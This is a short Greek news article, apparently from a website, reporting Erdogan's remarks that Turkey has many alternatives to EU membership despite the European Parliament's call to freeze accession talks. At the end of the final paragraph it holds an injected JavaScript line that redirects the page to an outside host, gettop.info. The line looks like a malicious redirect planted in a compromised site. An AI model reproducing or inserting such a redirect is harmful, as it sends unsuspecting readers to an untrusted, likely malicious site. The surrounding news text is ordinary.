Ερντογάν: Έχουμε πάρα πολλές εναλλακτικές εκτός από την ΕE

0
4

 

Σε ομιλία του στην Κωνσταντινύπολη ο ούρκος πρόεδρος Ταγίπ Ερντογάν δήλωσε πως η Τουρκία έχει «πάρα πολλές εναλλακτικές» εκτός από την ένταξή της στην ΕΕ.

Προσέθεσε ωστόσο ότι «δεν έχει κλείσει το βιβλίο» της ΕΕ, παρά την πρόταση του Ευρωκοινοβουλίου να παγώσουν οι ενταξιακές διαπραγματεύσεις με την Άγκυρα.

«Δεν έχουμε ακόμη κλείσει το βιβλίο της ΕΕ, όμως το τρέχον πλαίσιο δεν μας επιτρέπει να έχουμε αισιόδοξες προσδοκίες», είπε χαρακτηριστικά ο Ταγίπ Ερντογάν ο οποίος σημείωσε ότι «υπάρχουν για την Τουρκία πάρα πολλές εναλλακτικές εκτός από την ΕΕ«.

Χωρίς να δώσει άλλες διευκρινίσεις ο Τούρκος πρόεδρος σημείωσε ότι η Άγκυρα βρίσκεται σε συζητήσεις με άλλους πιθανούς εταίρους. «Μπορούμε να συνεχίσουμε τον δρόμο μας με έναν από αυτούς», τόνισε.

Αυτές οι δηλώσεις είνια συνέχεια προηγούμενων οπότε είχε σημεώσει ότι η Τουρκία δεν χρειάζεται να ενταχθεί στην ΕΕ «με οποιοδήποτε κόστος» ενώ άφησε να εννοηθεί ότι η χώρα του ενδέχεται να γίνει μέλος του Οργανισμού Συνεργασίας της Σανγκάης (SCO). setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here